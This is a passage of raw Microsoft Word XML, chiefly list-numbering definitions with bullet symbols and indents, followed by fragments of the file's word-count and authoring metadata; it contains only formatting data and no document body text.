        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="47E22E7E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EF067E66">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A4AE1D0C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="ACC8E98A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="027C9190">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E1C61AD2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5D969D4C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E304CC3C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="42B30D88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74F45796"/>
    <w:lvl w:ilvl="0" w:tplc="AC46A24E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3A541060">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B6CE8914">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="254E8CF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BCB88E94">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2EF8516E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7A5CACA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EC10B588">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C3D67C8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4DDE737E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0EAD860"/>
    <w:lvl w:ilvl="0" w:tplc="6672BD24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C924EB52">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="31FC1C9E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3EE40904">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2E2252B0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B2108B00">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EB7A49D2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="764811EA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AC06E114">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="836726854">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1958679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69"/>
    <w:rsid w:val="00002994"/>
    <w:rsid w:val="0037194F"/>
    <w:rsid w:val="00B216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57BF650"/>
  <w15:docId w15:val="{A208B177-B10F-964D-91B8-DD3C1978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3829</Words>
  <Characters>21831</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>181</Lines>
  <Paragraphs>51</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>25609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owner</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-27T02:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-27T02:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>